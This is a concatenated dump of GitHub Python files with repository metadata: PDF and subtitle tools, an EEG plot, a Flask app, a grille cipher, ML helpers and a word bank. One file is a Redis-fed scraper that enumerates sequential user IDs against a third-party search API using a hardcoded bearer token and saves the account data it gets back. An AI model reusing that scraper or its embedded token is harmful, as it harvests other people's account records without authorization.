argparse.ArgumentParser(description=_('STPDF - easily convert scans to pdf'))\n parser.add_argument(\"source\",\n nargs=\"?\",\n type=str,\n default=os.getcwd(),\n help=_('Scan images location'))\n parser.add_argument(\"destination\",\n nargs=\"?\",\n type=str,\n default=\"STPDF_Output\",\n help=_('Destination of modified files'))\n parser.add_argument(\"--sa\", \"--split-at\", type=int,\n help=_(\"Number of images per pdf\"))\n parser.add_argument(\"--ds\", \"--deskew\",\n help=_('Removes image rotation, requires tesseract'),\n action=\"store_true\")\n parser.add_argument(\"--r\", \"--resolution\", type=float,\n default=80.0,\n help=_(\"Resolution of final rotated image, must be a value like 90.5\"))\n parser.add_argument(\"--ll\", \"--log-level\", type=str,\n default=\"INFO\",\n help=_(\"Sets the console log level\"))\n parser.add_argument(\"--l\", \"--language\", type=str,\n default=\"en\",\n help=_(\"Switch language, language must be 2 letter code EX: en or pt\"))\n parser.add_argument(\"--kv\", \"--keep-values\",\n type=str,\n help=_(\"Save your current input in a file, can't be used with --lv\"),\n action=\"store\")\n parser.add_argument(\"--lv\", \"--load-values\",\n type=str,\n help=_(\"Load values from settings file, can't be used with --kv\"),\n action=\"store\")\n parser.add_argument(\"--sc\", \"--skip-check\",\n help=_(\"Automatically answers yes when values are verified\"),\n action=\"store_true\")\n parser.add_argument(\"--dc\", \"--do-copy\",\n help=_(\"If True images will be copied to the destination directory, default:False\"),\n default=False,\n action=\"store_true\")\n parser.add_argument(\"--mp\", \"--make-pdf\",\n help=_(\"If True make a pdf out of the processed images, default:True\"),\n default=True,\n action=\"store_true\")\n v_text = \"\\n\\t%s: %s,\\n\\t%s: %s,\" % (_(\"Version\"), __version__,\n _(\"Full version\"), __version2__)\n r_text = \"\\n\\t%s: %s,\\n\\t%s: %s,\" % (_(\"Release date\"), __releaseDate__,\n _(\"Developed by\"), __developer__)\n home = \"\\n\\t%s: %s\" % (_(\"Project home\"), __devhome__)\n all_info = v_text + r_text + home\n parser.add_argument('--version', action='version',\n version='%(prog)s {vi}'.format(vi=all_info))\n args = parser.parse_args()\n return args\n\n\nif __name__ == \"__main__\":\n gettext.install(\"stpdf_cli\")\n args = assemble_parser()\n lang = getattr(args, \"l\")\n install_lang(lang)\n loggr = install_logger(getattr(args, \"ll\"))\n settings = None\n try:\n loggr.info(_(\"Checking settings\"))\n settings = check_settings(args)\n 
except Exception as e:\n sys.stdout.write(\"\\n\")\n for it in traceback.format_exception(type(e), e, e.__traceback__):\n loggr.debug(it)\n msg = \"%s: %s\" % (_(\"Failed to create settings \"), str(e))\n loggr.critical(msg + \"\\n\")\n sys.exit(1)\n msg = \"%s: %s\" % (_(\"Settings\"), settings)\n loggr.debug(msg)\n has_required = verify_args(args)\n if has_required is True:\n cli = STPDFCLI(args.source, args.destination,\n logger=loggr, settings=settings,\n uargs=args)\n cli.run_converter()\n cli.logger.info(_(\"Finished\"))\n sys.exit(0)\n else:\n loggr.critical(has_required + \"\\n\")\n sys.exit(1)\n","repo_name":"hallowslab/STPDF","sub_path":"src/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":10709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24784835452","text":"import argparse\r\nimport re\r\n\r\n# Set up argparse\r\nparser = argparse.ArgumentParser(description='Convert a subtitle file to a formatted text file.')\r\nparser.add_argument('input_file',\r\n metavar='input_file', type=str, help='The input subtitle file in .srt format')\r\nparser.add_argument('output_file',\r\n metavar='output_file', type=str, help='The output file to write formatted text to')\r\nargs = parser.parse_args()\r\n\r\n# Read the input text from the specified file\r\nwith open(args.input_file, 'r') as file:\r\n input_text = file.read()\r\n\r\n# Use regular expression to find the timestamp and text on separate lines\r\npattern = r'(\\d{2}:\\d{2}:\\d{2}),\\d{3} --> (\\d{2}:\\d{2}:\\d{2}),\\d{3}\\n(.+?)(?=\\n)'\r\nmatches = re.findall(pattern, input_text, re.DOTALL)\r\n\r\n# Write output to the specified file\r\nwith open(args.output_file, 'w') as file:\r\n for i, match in enumerate(matches):\r\n print(f'match {i}: {match}')\r\n start, end, text = match\r\n file.write(f'{start[3:]} - {text}\\n')\r\n # file.write(text)","repo_name":"hu-po/chaptergen","sub_path":"srt_to_chapters.py","file_name":"srt_to_chapters.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26007792884","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 7 17:55:34 2019\nplot normalized EEG spectrogram during NREM to REM transition \nalong with EMG amplitude\n\n@author: tortugar\n\"\"\"\n\nimport sys\nsys.path.append('/Users/tortugar/Google Drive/Penn/Programming/PySleep')\nimport sleepy\nimport numpy as np\nimport matplotlib.pylab as plt\nimport scipy.io as so\nimport os\nimport pandas as pd\nimport seaborn as sns\nimport re\nfrom functools import reduce\n\n\nppath = '/Users/tortugar/Documents/Penn/Data/RawData/mPFCData'\nrecordings = ['J55_111018n1', 'J53_110718n1', 'J31_101618n1', 'J54_110518n1']\n#recordings = ['JS80_050319n1', 'JS79_050319n1']\n#recordings = ['JS80_050319n1']\n\nppath = '/Users/tortugar/Documents/Penn/Data/RawData/'\nwt_rec = 'wt_recordings.txt'\n(recordings,E) = sleepy.load_recordings(ppath, wt_rec)\n\n# minimum duration of REM period\n# to be included in calculation:\nrem_thr = 30\npre = 60\npost = 60\nfmax = 150\nfmin = 0\nmu = [5, 50]\npeeg = True\n\n# get list of all mice \nmice = []\nfor name in recordings:\n idf = re.split('_', name) [0]\n if idf not in mice:\n mice.append(idf)\n\n\nspec_mice = {m:[] for m in mice}\nampl_mice = {m:[] for m in mice}\nfor name in recordings:\n idf = re.split('_', name) [0]\n\n # load EMG\n Q = so.loadmat(os.path.join(ppath, name, 'msp_%s.mat'%name), squeeze_me=True)\n 
SM = Q['mSP']\n freq = Q['freq']\n df = freq[1]-freq[0]\n imu = np.where((freq>=mu[0]) & (freq<=mu[-1]))[0]\n ampl = np.sqrt(SM[imu,:].sum(axis=0)*df)\n \n # load normalized spectrogram\n #SP, t, freq = sleepy.normalize_spectrogram(ppath, name, fmax, pplot=False)\n if peeg:\n P = so.loadmat(os.path.join(ppath, name, 'sp_' + name + '.mat'), squeeze_me=True)\n SP = P['SP']\n else:\n # use EMG\n P = so.loadmat(os.path.join(ppath, name, 'msp_' + name + '.mat'), squeeze_me=True)\n SP = P['mSP']\n \n freq = P['freq']\n t = P['t']\n\n ifreq = np.where((freq<=fmax) & (freq>=fmin))[0]\n SP = SP[ifreq,:]\n\n sp_mean = SP.mean(axis=1)\n SP = np.divide(SP, np.tile(sp_mean, (SP.shape[1], 1)).T)\n\n M = sleepy.load_stateidx(ppath, name)[0]\n seq = sleepy.get_sequences(np.where(M==1)[0])\n \n SR = sleepy.get_snr(ppath, name)\n NBIN = np.round(2.5*SR)\n dt = NBIN * 1.0/SR\n \n ipre = int(np.round(pre/dt))\n ipost = int(np.round(post/dt))\n \n for s in seq:\n if len(s)*dt >= rem_thr and s[0]-pre >=0 and s[0]+ipost < len(M):\n tmp = SP[:, s[0]-ipre:s[0]+ipost]\n spec_mice[idf].append(tmp)\n\n tmp = ampl[s[0]-ipre:s[0]+ipost]\n ampl_mice[idf].append(tmp)\n \nn = ipre+ipost\nampl_mx = np.zeros((len(mice), n))\nspec_mx = np.zeros((len(ifreq), n, len(mice)))\n\nfor (i, idf) in zip(range(n), mice):\n ampl_mx[i,:] = np.array(ampl_mice[idf]).mean(axis=0)\n spec_mx[:,:,i] = np.array(spec_mice[idf]).mean(axis=0)\n \n\n# plot figure ##################\nsns.set()\nplt.ion()\nplt.figure()\nt = np.arange(-ipre, ipost)*dt\nax = plt.axes([0.1, 0.4, 0.8, 0.5])\nax.pcolor(t, freq[ifreq], spec_mx.mean(axis=2), cmap='jet')\nsleepy.box_off(ax)\nax.set_xticklabels('') \nplt.ylabel('Freq (Hz)')\n\n\namp_data = list(np.reshape(ampl_mx, (len(mice)*len(t),)))\namp_time = list(t)*len(mice)\namp_idf = reduce(lambda x,y: x+y, [[b]*len(t) for b in mice])\ndata = [[a,b,c] for (a,b,c) in zip(amp_idf, amp_time, amp_data)]\ndf = pd.DataFrame(columns=['Idf', 'Time', 'Ampl'], data=data)\n\nax2 = plt.axes([0.1, 0.1, 0.8, 0.2])\nsns.lineplot(data=df, x='Time', y='Ampl', ci='sd')\n#plt.plot(t, ampl_mx.mean(axis=0), color='r')\nplt.ylim([0, 30])\nplt.xlabel('Time (s)')\nplt.xlim([t[0], t[-1]])\nsleepy.box_off(ax2)\nplt.show()\n\n\n\n\n\n\n\n","repo_name":"tortugar/Lab","sub_path":"PyScripts/PhasicEvents/spont_rem.py","file_name":"spont_rem.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"34753598894","text":"import sqlite3\nfrom random import randint\nfrom pprint import pprint\nfrom flask import Flask, g, render_template, jsonify, url_for\nimport sys\n\nDATABASE = 'reikuappdb.db'\n\napp = Flask(__name__)\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect(DATABASE)\n return db\n\ndef query_db(query, args=(), one=False):\n cur = get_db().execute(query, args)\n rv = cur.fetchall()\n cur.close()\n return (rv[0] if rv else None) if one else rv\n\n@app.route(\"/\")\ndef index():\n lugares = query_db('select * from lugares')\n item = lugares[randint(0, len(lugares) - 1)]\n pprint(lugares)\n return render_template('index.html', item = item)\n\n\n@app.route(\"/nosotros\")\ndef nosotros():\n return render_template('nosotros.html')\n\n@app.route('/json')\ndef json_response():\n lugares = query_db('select * from lugares')\n\n lugares_dict = []\n\n for i in lugares:\n lugares_dict.append({\n \"titulo\": i[1],\n \"subtitulo\": i[2],\n \"latitud\": i[3],\n \"longitud\": i[4],\n \"imagen\": i[5],\n 
\"descripcion\": i[6],\n \"fuente\": i[7],\n })\n\n return jsonify(lugares_dict)\n\n@app.route('/insertar_score//')\ndef score(nombre, score):\n\n conn = sqlite3.connect(DATABASE)\n c = conn.cursor()\n\n item = [nombre, score]\n\n try:\n c.execute('insert into score (jugador, puntaje) values (?,?)', item)\n except sqlite3.IntegrityError as e:\n return jsonify({\"success\": False, \"message\": \"Ha ocurrido un error al insertar los datos\"})\n\n conn.commit()\n\n return jsonify({\"success\": True, \"message\": \"Se han insertado los datos exitosamente\"})\n\n\n@app.route('/getscore')\ndef lista_scores ():\n scores=query_db('select * from score')\n return jsonify(scores)","repo_name":"solbencas/reikuaap.py","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"es","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"40981989917","text":"\ndef rotate (Matrix,right):\n MatrixAux = [row[:] for row in Matrix]\n n=len(Matrix)\n if right:\n for i in range(0,n):\n for j in range(0,n):\n MatrixAux[i][j] =Matrix[n-1-j][i] \n return MatrixAux\n else:\n for i in range(0,n):\n for j in range(0,n):\n MatrixAux[n-1-j][i] =Matrix[i][j] \n return MatrixAux\n\ndef encrypt (Matrix,plainText, right):\n n=len(Matrix)\n plainText_list = list(plainText)\n T=[[0]*n for i in range(n)]\n \n o=0\n for k in range(0,4):\n for i in range(0,n):\n for j in range(0,n):\n if(Matrix[i][j]==1):\n T[i][j] = plainText_list[o]\n o+=1\n Matrix= rotate(Matrix,right)\n cypherText=\"\"\n \n for i in range(0,n):\n for j in range(0,n):\n cypherText+=T[i][j]\n return cypherText\n\n\ndef Decrypt (Matrix,cypherText, right):\n n=len(Matrix)\n cypherText_list = list(cypherText)\n T=[[0]*n for i in range(n)]\n \n p=0\n for i in range(0,n):\n for j in range(0,n):\n T[i][j] = cypherText_list[p]\n p+=1\n plainText=\"\"\n for k in range(0,4):\n for i in range(0,n):\n for j in range(0,n):\n if(Matrix[i][j]==1):\n plainText+=T[i][j]\n Matrix=rotate(Matrix,right)\n\n return plainText\n\nprint(\"\\n Griller Cipher\\n\")\n#print(\"Ingrese, el tamano de la matriz: \")\n#n=input()\n#Matrix = [ [-1 for columna in range(0,n)] for fila in range (0,n)]\n#for i in range(0,n):\n# for j in range(0,n):\n# print(\"\\n Ingrese, el tamano de la matriz en la posicion \\n\",\" \",i,\" \",j)\n# Matrix[i][j]=input()\n#print(\"Por Favor ingrese el sentido giratorio(1, para derecha o 0, para izquierda)\")\n#sentido=input()\n#if(sentido==1):\n# sentido=True\n#else: sentido=False\n#\n\nMatrix=[[1,0,0,0],[0,0,0,0],[0,1,0,1],[0,0,1,0]]\nsentido=True\n\nbegin=1\nwhile(begin==1):\n print(\" Options: \\n 0. To close the program.\\n 1. To encrypt\\n 2. 
To decrypt\\n Enter value: \")\r\n    instruction=input()\r\n    if(instruction=='1'):\r\n        print(\" Enter the phrase to encrypt in CAPITAL LETTER: \")\r\n        plainText=input()\r\n        print(\" The encryption is: \",encrypt(Matrix,plainText,sentido))\r\n    else:\r\n        if(instruction=='2'):\r\n            print(\" Enter the phrase to decrypt in CAPITAL LETTER:\")\r\n            encryptText=input()\r\n            print(\" The decryption is: \",Decrypt(Matrix,encryptText,sentido))\r\n        else: begin=0\r\n    print(\"\\n Press enter to continue...\")\r\n    input()","repo_name":"adchavesm/Cryptography","sub_path":"GrilleCipher.py","file_name":"GrilleCipher.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69964120170","text":"from collections import defaultdict\nfrom typing import Callable, Dict, Union\n\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nimport torch\n\nclass AccuracyTester:\n    \"\"\"\n    Abstraction to wrap accuracy calculation, used during training after each epoch\n    \"\"\"\n    def __init__(self, loader: DataLoader, device: Union[torch.device, str]=\"cuda\") -> None:\n        \"\"\"\n\n        Args:\n            loader (DataLoader): Loader for the test set\n            device (Union[torch.device, str], optional): Device to run the testing on. Defaults to \"cuda\".\n        \"\"\"\n        self.loader = loader\n        self.device = device\n    \n    def __call__(self, model: nn.Module) -> float:\n        restore = model.training\n        model.eval()\n        correct = 0\n        num_samples = 0\n        with torch.no_grad():\n            for images, labels in self.loader:\n                images = images.to(self.device)\n                labels = labels.to(self.device)\n                correct += (model(images).argmax(1) == labels).sum()\n                num_samples += len(labels)\n\n        if restore:\n            model.train()\n\n        return float(correct / num_samples) \n\n\ndef get_batch_accuracy(model: nn.Module, images: torch.Tensor, labels: torch.Tensor) -> float:\n    \"\"\"\n    Get accuracy for one batch of images\n\n    Args:\n        model (nn.Module): model\n        images (torch.Tensor): images\n        labels (torch.Tensor): labels\n\n    Returns:\n        float: accuracy over the batch\n    \"\"\"\n    restore = model.training\n    model.eval()\n    with torch.no_grad():\n        acc = float(torch.sum(model(images).argmax(dim=1) == labels) / len(labels))\n    if restore:\n        model.train()\n    return acc\n\ndef get_class_accuracy(model: nn.Module, test_loader: DataLoader, device: Union[torch.device, str]=\"cuda\") -> Dict[int, float]:\n    \"\"\"\n    Get class-wise accuracy for a dataset\n\n    Args:\n        model (nn.Module): model\n        test_loader (DataLoader): loader for the test set\n        device (Union[torch.device, str], optional): device to run the testing on. 
Defaults to \"cuda\".\n\n Returns:\n Dict[int, float]: _description_\n \"\"\"\n restore = model.training\n num_correct = defaultdict(lambda : 0)\n num_samples = defaultdict(lambda : 0)\n model.eval()\n with torch.no_grad():\n for images, labels in test_loader:\n labels_unique = torch.unique(labels).tolist()\n for l in labels_unique:\n images_l = images[labels == l].to(device)\n labels_l = labels[labels == l].to(device)\n num_correct[l] += torch.sum(model(images_l).argmax(dim=1) == labels_l).item()\n num_samples[l] += len(labels_l)\n\n if restore:\n model.train()\n \n return {l: num_correct[l] / num_samples[l] for l in num_correct.keys()}","repo_name":"Ahmedjjj/Fed_distill","sub_path":"fed_distill/train/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16064823956","text":"class Account:\r\n\r\n def __init__(self,name = None,balance = 0):\r\n self.name = name\r\n self.balance = balance\r\n\r\n \r\n \r\nclass SavingsAccount(Account):\r\n\r\n def __init__(self,name,balance,intresrate):\r\n # write your code here\r\n super().__init__(name,balance)\r\n self.intrestrate = intresrate\r\n\r\n \r\na2 = SavingsAccount(\"Ashish\",5000,5)\r\nprint(a2.name)\r\nprint(a2.balance)\r\nprint(a2.intrestrate) \r\n","repo_name":"AakashShinde123/DS300123","sub_path":"Assignment_5/Challenge_4.py","file_name":"Challenge_4.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10041497006","text":"#!/usr/bin/env python\n\nimport sys\nimport json\nimport redis\nimport time\nimport signal\nimport requests\nimport configparser\n\nr: redis.Redis = None\nQX_ID_SEQ = 'qx_id_seq'\nGET_USERS_KEY = 'qx_validate_users'\ncf: configparser.ConfigParser = None\nprocess_number: str = None\n\nREQUEST_TOKEN = \"\"\"Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIxMDIyNzY2MSIsImFjY2lkIjoiMTY4NTYwNzIiLCJuaWNr\\\nIjoiMTExIiwiYWNjVG9rZW4iOiJiNGJkZTNlZWNmOGFjZjc5YmRlYmY2MjZkY2YzNjcxNSIsIm5iZiI6MTU0NjU4NTUxOCwiZXhwIjoxNTQ5MDA0NzE4LCJ\\\npc3MiOiJ0aGUgbmFtZSBvZiB0aGUgaXNzdWVyIiwiYXVkIjoidGhlIG5hbWUgb2YgdGhlIGF1ZGllbmNlIn0.D8fbdlNuKMlovDbvjpOD2Sy0Ned7wgCbRM\\\n5h5vnlCnQ\"\"\"\n\n\ndef __init():\n \"\"\"系统初始化\"\"\"\n global r, cf\n cf = configparser.ConfigParser()\n cf.read(sys.argv[1])\n r = redis.Redis(host=cf.get(\"redis\", 'DB_HOST'), port=cf.get(\"redis\", \"DB_PORT\"), db=cf.getint(\"redis\", \"DB_INDEX\"),\n password=cf.get(\"redis\", 'DB_PASSWORD'), decode_responses=True)\n\n\ndef main():\n __init()\n while True:\n try:\n _, id = r.blpop(QX_ID_SEQ, 20)\n request(str(id))\n except TypeError:\n continue\n\n\ndef request(qxid: str):\n global process_number\n process_number = qxid\n try:\n res = requests.post('http://66.liuliuda668.com:8080/user/search',\n headers={'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; MIX 2 MIUI/9.1.2)',\n 'Authorization': REQUEST_TOKEN}, data={\"qxid\": \"qx\" + qxid}, timeout=3)\n\n except requests.exceptions.BaseHTTPError:\n r.lpush(QX_ID_SEQ, qxid)\n print('qxid %s net work error' % qxid)\n except requests.exceptions.ConnectTimeout:\n r.lpush(QX_ID_SEQ, qxid)\n print('qxid %s net work error' % qxid)\n except requests.exceptions.ReadTimeout:\n r.lpush(QX_ID_SEQ, qxid)\n print('qxid %s net work error' % qxid)\n else:\n if res.status_code != 200:\n print('server response code %d ' % res.status_code)\n r.lpush(QX_ID_SEQ, qxid)\n else:\n if 
res.json()['data']['accid']:\n print(res.json()['data'])\n r.rpush(GET_USERS_KEY, json.dumps(res.json()['data']))\n else:\n print('qxid %s is not found' % qxid)\n res.close()\n\n\ndef halt(signum, frame):\n if process_number:\n r.lpush(QX_ID_SEQ, '%s' % process_number)\n print(\"sync qx_id [%s]\" % process_number)\n print(\"Bye Bye ....\")\n sys.exit()\n\n\nsignal.signal(signal.SIGINT, halt)\nsignal.signal(signal.SIGTERM, halt)\nmain()\n","repo_name":"steven-ok/spider","sub_path":"qx-spider.py","file_name":"qx-spider.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5509204716","text":"from typing import Optional, Iterable, List, Dict, Iterable\nimport re\nimport logging\nfrom string import ascii_uppercase\nfrom functools import lru_cache\n\nfrom lemminflect import getInflection, getLemma\n\nfrom FLD_generator.word_banks.base import WordBank, POS, VerbForm, AdjForm, NounForm\nfrom nltk.corpus.reader.wordnet import Synset, Lemma\nfrom nltk.corpus import wordnet as wn\nfrom FLD_generator.utils import starts_with_vowel_sound\nfrom .base import WordNetWordBank\n\nlogger = logging.getLogger(__name__)\n\n\n@lru_cache(maxsize=1000000)\ndef _getLemma(word: str) -> str:\n # TODO: pos other than VERB\n return getLemma(word, upos='VERB')[0]\n\n\nclass EnglishWordBank(WordNetWordBank):\n\n language = 'eng'\n\n _verb_inflation_mapping = {\n VerbForm.NORMAL: 'VB',\n VerbForm.ING: 'VBG',\n VerbForm.S: 'VBZ',\n }\n\n __intermediate_constant_words = [\n f'THING-{alphabet}'\n for alphabet in ascii_uppercase\n ]\n\n def __init__(self,\n transitive_verbs: Optional[Iterable[str]] = None,\n intransitive_verbs: Optional[Iterable[str]] = None,\n vocab_restrictions: Optional[Dict[POS, Iterable[str]]] = None):\n super().__init__(vocab_restrictions=vocab_restrictions)\n\n self._transitive_verbs = set(verb.lower() for verb in transitive_verbs) if transitive_verbs is not None else None\n self._intransitive_verbs = set(verb.lower() for verb in intransitive_verbs) if intransitive_verbs is not None else None\n\n @property\n def _intermediate_constant_words(self) -> List[str]:\n return self.__intermediate_constant_words\n\n @profile\n def get_lemma(self, word: str) -> str:\n return _getLemma(word)\n\n def _change_verb_form(self, verb: str, form: VerbForm, force=False) -> List[str]:\n if form in [VerbForm.NORMAL, VerbForm.ING, VerbForm.S]:\n if verb in ['am', 'are', 'is', 'was', 'were']:\n logger.warning('Changing verb form for be-verb \"{%s}\" is subtle. 
Thus, we do not change it\\'s form.', verb)\n return [verb]\n else:\n verb = self.get_lemma(verb)\n\n results = getInflection(verb, tag=self._verb_inflation_mapping[form])\n\n if results is not None:\n return [results[0]]\n else:\n if form == VerbForm.NORMAL:\n # watch\n inflated_verb = verb\n elif form == VerbForm.ING:\n # [現在分詞](https://www2.kaiyodai.ac.jp/~takagi/econ/kougo82.htm)\n if re.match('.*[^aeiou]e$', verb):\n # date -> dating\n inflated_verb = verb[:-1] + 'ing'\n elif re.match('.*[^aeiou][aeiou][^aeiou]$', verb):\n # sit -> sitting\n inflated_verb = verb + verb[-1] + 'ing'\n else:\n inflated_verb = verb + 'ing'\n elif form == VerbForm.S:\n # [3単現及び名詞の複数形の -s, -es](https://www2.kaiyodai.ac.jp/~takagi/econ/kougo52.htm)\n if re.match('.*(s|sh|ch|x|o)$', verb):\n # wash -> washes\n inflated_verb = verb + 'es'\n elif re.match(r'.*[^aeiou]y$', verb):\n # study -> studies\n inflated_verb = verb[:-1] + 'ies'\n else:\n inflated_verb = verb + 's'\n else:\n raise NotImplementedError()\n return [inflated_verb]\n elif form == VerbForm.ANTI:\n antonyms = self.get_antonyms(verb)\n if len(antonyms) == 0 and force:\n raise NotImplementedError()\n return antonyms\n else:\n raise ValueError()\n\n\n def _change_adj_form(self, adj: str, form: AdjForm, force=False) -> List[str]:\n if form == AdjForm.NORMAL:\n return [adj]\n\n elif form == AdjForm.NESS:\n if adj.endswith('y'):\n # peaky -> peakiness\n ness_adj = adj[:-1] + 'iness'\n else:\n ness_adj = adj + 'ness'\n if force or ness_adj in self._cached_word_set:\n return [ness_adj]\n else:\n return []\n\n elif form == AdjForm.ANTI:\n antonyms = self.get_antonyms(adj)\n antonyms += [word for word in self._change_adj_form(adj, AdjForm.NEG)\n if word not in antonyms]\n if len(antonyms) == 0 and force:\n return self._change_adj_form(adj, AdjForm.NEG, force=True)\n return sorted(set(antonyms))\n\n elif form == AdjForm.NEG:\n negnyms = self.get_negnyms(adj)\n if len(negnyms) == 0 and force:\n return [f'non-{adj}']\n return negnyms\n\n else:\n raise ValueError(f'Unknown form {form}')\n\n def _change_noun_form(self, noun: str, form: NounForm, force=False) -> List[str]:\n if form == NounForm.NORMAL:\n return [noun]\n\n elif form == NounForm.SINGULAR:\n return [noun]\n\n elif form == NounForm.SINGULAR_WITH_PARTICLE:\n \"\"\"\n We assume that all the words are countable, thus, all the words in singular form need an indefinite particle, i.e., \"a\" or \"an\".\n This approximation is because that detecting the word countability is a challenging problem.\n See [here](https://stackoverflow.com/questions/7822922/noun-countability) for example.\n\n For detecting \"a\" vs \"an\", we borrowed implementation from https://stackoverflow.com/questions/20336524/verify-correct-use-of-a-and-an-in-english-texts-python .\n\n TODO: We might be able to detect the countability\n using existent resources like [Category:Uncountable nouns - Simple English Wiktionary](https://simple.wiktionary.org/wiki/Category:Uncountable_nouns).\n \"\"\"\n\n return [f'an {noun}' if starts_with_vowel_sound(noun) else f'a {noun}']\n\n elif form == NounForm.PLURAL:\n raise NotImplementedError()\n\n elif form == NounForm.ANTI:\n antonyms = self.get_antonyms(noun)\n antonyms += [word for word in self._change_noun_form(noun, NounForm.NEG)\n if word not in antonyms]\n if len(antonyms) == 0 and force:\n return self._change_noun_form(noun, NounForm.NEG, force=True)\n return antonyms\n\n elif form == NounForm.NEG:\n negnyms = self.get_negnyms(noun)\n if len(negnyms) == 0 and force:\n return [f'non-{noun}']\n 
return negnyms\n\n        else:\n            raise ValueError(f'Unknown form {form}')\n\n    def _can_be_transitive_verb_synset(self, syn: Synset) -> bool:\n        if self._transitive_verbs is None:\n            raise ValueError('Set transitive verb list')\n        lemma = self._get_lemma(syn)\n        return lemma is not None and lemma.name().lower() in self._transitive_verbs\n\n    def _can_be_intransitive_verb_synset(self, syn: Synset) -> bool:\n        if self._intransitive_verbs is None:\n            raise ValueError('Set intransitive verb list')\n\n        lemma = self._get_lemma(syn)\n        return lemma is not None and lemma.name().lower() in self._intransitive_verbs\n\n    def get_negnyms(self, word) -> List[str]:\n        # See [here](https://langsquare.exblog.jp/28548624/) for the following detection rules.\n        negnyms = []\n        negation_prefixes = ['in', 'im', 'il', 'ir', 'un', 'dis', 'non']\n        negation_postfixes = ['less']\n\n        for antonym in self.get_antonyms(word):\n            if any([antonym == f'{prefix}{word}' for prefix in negation_prefixes])\\\n                    or any([antonym == f'{word}{postfix}' for postfix in negation_postfixes]):\n                negnyms.append(antonym)\n\n            if any((word.startswith(prefix) and word[len(prefix):] in self._cached_word_set\n                    for prefix in negation_prefixes))\\\n                    or any((word.endswith(postfix) and word[:-len(postfix)] in self._cached_word_set\n                    for postfix in negation_postfixes)):\n                negnyms.append(antonym)\n        return negnyms\n","repo_name":"hitachi-nlp/FLD-generator","sub_path":"FLD_generator/word_banks/wordnet/english.py","file_name":"english.py","file_ext":"py","file_size_in_byte":8362,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"70500392489","text":"from parsers.common import scrape_word_data\nfrom utils.general.common import write_todo\nfrom utils.sanhedrin_finalise_lobjs_and_create_nexus.tools import is_it_the_same_meaning, q, show1, \\\n    user_validate_translations, compare_lobj_id_root\nfrom utils.postprocessing.common import finalise_lemma_objects\nfrom utils.scraping.common import check_rescraped_against_existing\nfrom utils.universal import color as c, get_curried_save, load_tempsave_if_exists, load_data\n\nif __name__ == '__main__':\n\n    # # # # # #\n    wordtype = \"ver\"\n    batch = \"01\"\n    target_lang = \"ENG\"\n    only_run_for_this_many_lobjs = 0  # Only set to integer for testing purposes.\n    # # # # # #\n\n    filename = f\"{wordtype}_batch_{batch}_SRC\"\n    stem = \"./../../output_saved/batches/\"\n    input_path = f\"{stem}{filename}_original\"\n    output_path = f\"{stem}{filename}\"\n    tempsave_path = output_path + \"_S02_tempsave\"\n    save = get_curried_save(output_path, tempsave_path)\n\n    c.print_teal(\"input_path = \" + c.teal(input_path))\n    c.print_teal(\"output_path = \" + c.teal(output_path))\n    c.print_teal(\"tempsave_path = \" + c.teal(tempsave_path))\n\n    doublechecked_src_lobjs = load_tempsave_if_exists(tempsave_path)\n    cmd_history = []\n\n    ready = True\n    if len(doublechecked_src_lobjs):\n        id_of_last_done_src_lobj = doublechecked_src_lobjs[-1][\"id\"]\n        ready = False\n\n    src_lobjs = load_data(input_path)\n\n    if only_run_for_this_many_lobjs:\n        src_lobjs = src_lobjs[:only_run_for_this_many_lobjs]\n        c.print_bold(\"BUT FOR TESTING LET'S JUST SAY \" + str(len(src_lobjs)))\n\n    for src_lobj_index, src_lobj in enumerate(src_lobjs):\n        print(\"\")\n        print(\"\")\n        print(f\"{src_lobj_index + 1}/{len(src_lobjs)}\")\n\n        if ready:\n            user_validate_translations(src_lobj_index, src_lobj, doublechecked_src_lobjs, save, target_lang,\n                                       cmd_history)\n        else:\n            if not ready and compare_lobj_id_root(src_lobj[\"id\"], 
id_of_last_done_src_lobj):\n print(c.green(src_lobj[\"id\"]), \"is last item from tempsave.\")\n ready = True\n else:\n print(\"Already done\")\n\n for lob in doublechecked_src_lobjs:\n if \"additionalSpellings\" in lob:\n additional_spellings = lob[\"additionalSpellings\"]\n else:\n additional_spellings = []\n\n for tra in lob[\"translations\"][target_lang]:\n if tra[0] == \"+\":\n additional_spellings.append(tra[1:])\n\n if len(additional_spellings):\n print(lob[\"id\"], c.green(\"added additionalSpellings\"), additional_spellings)\n lob[\"additionalSpellings\"] = additional_spellings\n lob[\"translations\"][target_lang] = [t for t in lob[\"translations\"][target_lang] if t[0] != \"+\"]\n\n if ready:\n print(\"\")\n print(\"Done all lobjs, so now doublechecked_src_lobjs has length\", len(doublechecked_src_lobjs))\n\n save(doublechecked_src_lobjs)\n\n print(\"Completely 